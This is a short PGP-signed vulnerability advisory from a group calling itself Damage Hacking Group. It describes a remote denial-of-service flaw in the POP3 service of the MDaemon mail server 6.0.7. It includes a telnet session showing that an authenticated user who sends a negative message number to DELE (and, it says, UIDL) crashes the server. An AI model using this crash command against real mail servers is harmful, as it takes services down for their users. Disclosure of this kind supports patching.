-----BEGIN PGP SIGNED MESSAGE----- ########################################################* # Damage Hacking Group security advisory # www.dhgroup.org ########################################################* #Product: MDaemon SMTP/POP/IMAP server =>v.6.0.7 #Authors: Alt-N Technologies [www.mdaemon.com] #Vulnerability: remote DoS via POP3 service ########################################################* #Overview#-----------------------------------------------------# - From help-file: "MDaemon Server v6 brings SMTP/POP/IMAP and MIME mail services commonplace on UNIX hosts and the Internet to Windows based servers and microcomputers. MDaemon is designed to manage the email needs of any number of individual users and comes complete with a powerful set of integrated tools for managing mail accounts and message formats. MDaemon offers a scalable SMTP, POP3, and IMAP4 mail server complete with LDAP support, an integrated browser-based email client, content filtering, spam blockers, extensive security features, and more." #Problem#------------------------------------------------------# >telnet 127.0.0.1 110 +OK dark POP MDaemon ready using UNREGISTERED SOFTWARE 6.0.7 <MDAEMON-F200303080 224.AA2418601MD5635@dark> user dark +OK dark... Recipient ok pass ****** +OK dark@dark's mailbox has 13 total messages (2274775 octets). dele -1 Connection to host lost. ...and MDaemon is crashed. This bug (with negative digits) is founded in UIDL and DELE commands and it could be used by authorized users only. #Exploit#------------------------------------------------------# \* use telnet ;P *\ Best regards www.dhgroup.org D4rkGr3y icq 540981 -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com> iQCVAwUBPqtKZ24LIpseSJmPAQHWhQQAjLj+sAngFcInBvHaRlUplVCJKmsX1XNV K7ffaV4vWNRIGXye+cj4I6OQfX2lHp8Xdy0JJNNqtjMuFVzAqwl3XOwtzJOYIOaq cAlq/zCr68E9EhcRen8os1JfxgJPZkXk931uJv42aHznNdAExULS6JBBL+bWSByz 4M1wMejQETA= =fkU8 -----END PGP SIGNATURE-----